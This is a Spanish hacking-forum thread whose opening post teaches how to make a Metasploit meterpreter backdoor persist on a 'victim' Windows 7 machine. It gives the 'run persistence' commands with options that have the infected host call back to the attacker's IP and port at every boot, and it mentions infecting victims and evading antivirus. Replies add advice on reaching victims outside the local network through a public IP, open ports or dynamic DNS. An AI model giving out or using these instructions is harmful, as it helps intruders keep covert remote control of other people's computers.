comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Creando Backdoor Persistente en metasploit

  • 9 Respuestas
  • 6665 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Diciembre 04, 2016, 12:18:02 am »


Saludos fieles lectores en esta oportunidad les traigo un POST sobre como crear tu Backdoor persistente en msfconsole, ha pedido de un seguidor del blog que me dejo un mensaje en privado.

¿Que es Backdoor?

se le domina como puerta trasera, cabe decir que se ejecuta un "Script" remoto a la maquina de la victima con conexion puente al ordenador del atacante, para dejar al sistema vulnerado en escucha siempre.

El Backdoor persistente es compatible con todas las versiones de Windows.

Lo primero que deben tener en cuenta es lo siguiente, penetrar el sistema de tu victima, dejo los siguientes posts donde enseño como hacerlo por diferentes métodos, de igual manera burlar los "AV":


Luego de crear tu "Payload", posteriormente enviar el archivo infectado a tu victima tendremos su session meterpreter, en este caso haré la prueba de concepto en un Windows 7 service pack 1



Entonces lo que haremos sera ejecutar el comando persistente por default.
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
meterpreter > run persistence
voy a dejar bien claro lo siguiente, al ejecutar el comando run persistente estas dejando todo por Default, por ejemplo:

El puerto: 4444
IP: 192.168.1.35 (tu IP se adjuntara automáticamente)
Script Upload - directorio donde se alojara el Script vbs, que se ejecutara al momento que inicie el sistema de la victima.



Como vemos el archivo se subió correctamente en la carpeta por default.



Entonces reiniciaremos el equipo de la victima para ver si realmente nos carga  su sesión meterpreter, pero antes configuraremos el puerto de escucha, ya que en la infección se utilizo el puerto 5555.



Esperemos que cargue nuevamente el sistema windows, pero vemos en la siguiente imagen que hemos cambiado el puerto de escucha reemplazando el 5555 a 4444 que fue generado al momento de ejecutar persistence.



Como podemos observar automáticamente hemos tenido la conexión meterpreter.

ahora viene la pregunta de muchos:

¿si yo deseo establecer una IP y puerto diferente?

Pues sencillo vamos a utilizar algunos argumentos de persitence, un ejemplo es el siguiente:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
run persistence -U -i 5 -p 4444 -r 192.168.1.35
-U >> ejecuta automáticamente el usuario comprometido y establece logs.
-i  >> segundos de conexión para establecer. 
-p >> puerto de escucha.
-r >> IP de la maquina del atacante a añadir.




Entonces le añadí de igual manera el puerto 4444, y deje mi IP estatica por default, ya que es mi maquina de ataque:

Reinicie bruscamente el windows 7, entonces esperaremos a que cargue nuevamente.   



de igual manera hemos tenido su sesión meterpreter automáticamente, configurando nuestro propio script persistente.
« Última modificación: Marzo 03, 2017, 05:41:27 pm por puntoCL »

Desconectado _Default_

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Enero 02, 2017, 08:06:34 pm »
Vaya,soy nuevo en esto y nunca me imagine que fuera tan rápido y fácil  :D.
« Última modificación: Enero 02, 2017, 09:17:01 pm por Stiuvert »

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Enero 02, 2017, 08:16:00 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Vaya,soy nuevo en esto y nunca me imagine que fuera tan rápido y fácil  :D.

Agradecería mi vista otro color de fuente, si es facil pero lamentablemente hasta el Avast Free te detectaría este Backdoor  :P

Desconectado d0r127

  • *
  • Underc0der
  • Mensajes: 116
  • Actividad:
    0%
  • Reputación 1
  • Sin hocico y paranoico
    • Ver Perfil
« Respuesta #3 en: Febrero 24, 2017, 02:13:29 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
amigo disculpe tambien estoy interesado en el  curso. la pregunta es ,si conseguiste los links ,por que a my tampoco me funcionan

yo te recomiendo esto No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado salem

  • *
  • Underc0der
  • Mensajes: 45
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Marzo 03, 2017, 11:32:18 am »
como configurarlo si es para fuera de lan? porque eso en la misma red

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 372
  • Actividad:
    3.33%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #5 en: Marzo 03, 2017, 01:11:08 pm »
Colocas tu ip publica y abris los puertos. O usas no-ip y vinculas a esa direccion.
Pikaa~


Desconectado Blest777

  • *
  • Underc0der
  • Mensajes: 63
  • Actividad:
    0%
  • Reputación 0
  • Todo es vanidad.
    • Ver Perfil
« Respuesta #6 en: Mayo 13, 2017, 02:20:03 pm »
PikachuDorado puedes explicarme como crear una ip estatica para poder conectarme con la maquina remota y no se pierda la comunicación cuando se reinicie mi computadora?
... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

Desconectado Akra2k

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Mayo 15, 2017, 01:14:39 am »
crear ip estatica no podes, eso te lo da el proveedor de internet lo que podes hacer es usar un dynamic dns como no-ip, dtdns o el que quieras

Desconectado NSA17

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
    • Email
  • Twitter: @Leon17barbosa
« Respuesta #8 en: Septiembre 26, 2017, 01:50:38 pm »
mi pregunta es como puedo conseguir la ip de una computadora si esa pc esta muy lejos o esta en otro pais

Desconectado DinamicoBoys

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Octubre 03, 2017, 05:50:15 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
crear ip estatica no podes, eso te lo da el proveedor de internet lo que podes hacer es usar un dynamic dns como no-ip, dtdns o el que quieras

no-ip  ya no se usa para esos fines , si no quieres el fbi en tu puerta :v

 

¿Te gustó el post? COMPARTILO!



"Escaneo Invisible" con NMAP y Metasploit

Iniciado por Stiuvert

Respuestas: 3
Vistas: 6818
Último mensaje Junio 21, 2013, 09:33:46 pm
por GhostFire
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 3140
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral
[Armitage] Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por LucaSthefano

Respuestas: 2
Vistas: 2760
Último mensaje Abril 29, 2013, 07:20:08 pm
por Markuss97
MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Iniciado por BrowserNet

Respuestas: 8
Vistas: 5868
Último mensaje Abril 05, 2017, 01:37:02 am
por puntoCL
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL

Respuestas: 3
Vistas: 2204
Último mensaje Octubre 01, 2018, 03:05:53 pm
por Kyxda